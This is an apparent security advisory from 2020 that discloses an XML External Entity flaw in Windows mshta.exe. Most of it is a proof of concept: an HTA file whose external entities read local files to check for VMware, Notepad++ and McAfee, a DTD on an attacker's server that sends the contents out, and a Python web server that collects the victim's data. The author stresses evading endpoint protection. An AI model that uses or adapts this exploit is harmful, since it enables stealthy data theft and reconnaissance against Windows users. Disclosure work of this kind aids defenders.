Microsoft Windows MSHTA.EXE .HTA File XML Injection Vulnerability


Windows MSHTA.EXE .HTA File

An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more
scripting languages supported by Internet Explorer, such as VBScript or JScript. The HTML is used to generate the
user interface, and the scripting language is used for the program logic. An HTA executes without the constraints
of the internet browser security model; in fact, it executes as a "fully trusted" application.

[Vulnerability Type]
XML External Entity Injection

Information disclosure, Recon

[CVE Reference]

[Security Issue]
Windows mshta.exe allows processing of XML External Entitys, this can result in local data-theft and or program reconnaissance upon opening
specially crafted HTA files. From an attacker perspective, since we are not dependent on scripting languages like Javascript, VBScript or
WScript.Shell, we may have better chances at subverting endpoint protection systems as we are only using XML markup.

HTA exploits found online typically show code execution, with reliance on ActiveX Objects and scripting engines and hence are more
easily detected by security products. Many of these exploits also use payload obfuscation techniques for stealth. However, I found nothing
publicly documented that leverages XML injection targeting the mshta.exe HTA file-type.

Yea I know, no code execution. However, we get stealthy data theft with recon capabilities. Armed with this info, we can more accurately
target potential software vulnerabilities at a later date from info gathering a systems program installations. Usually, this type of recon
is seen in first-stage malware infections using the Windows CreateToolhelp32Snapshot API.

Therefore, since theres no documented HTA exploits using XXE attacks for this file type, I release the advisory.
Successfully tested on Windows 10 and Windows Servers 2016, 2019.

Multi program recon and check if running in a Virtual Machine all in a single HTA file, change IP accordingly.

1) "Doit.hta"

<?xml version="1.0"?>
<!-- VMware check -->
<!DOCTYPE xxe4u [ 
<!ENTITY % file SYSTEM "C:\ProgramData\VMware\VMware Tools\manifest.txt">
<!ENTITY % dtd SYSTEM "">

<!-- Notepad++ install check -->
<!DOCTYPE xxe4u [ 
<!ENTITY % file SYSTEM "C:\Program Files (x86)\Notepad++\change.log">
<!ENTITY % dtd SYSTEM "">

<!-- McAfee AV install check -->
<!DOCTYPE xxe4u [ 
<!ENTITY % file SYSTEM "C:\ProgramData\McAfee\MCLOGS\VSCoreVersionInfo.txt">
<!ENTITY % dtd SYSTEM "">

2) The "datatears.dtd" DTD file hosted on attackers server.

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM ';'>">

3) Local Python v3 web-server listening on port 8000 to receive victims info.

python -m http.server 

[POC Video URL]

# [2020-07-19]  #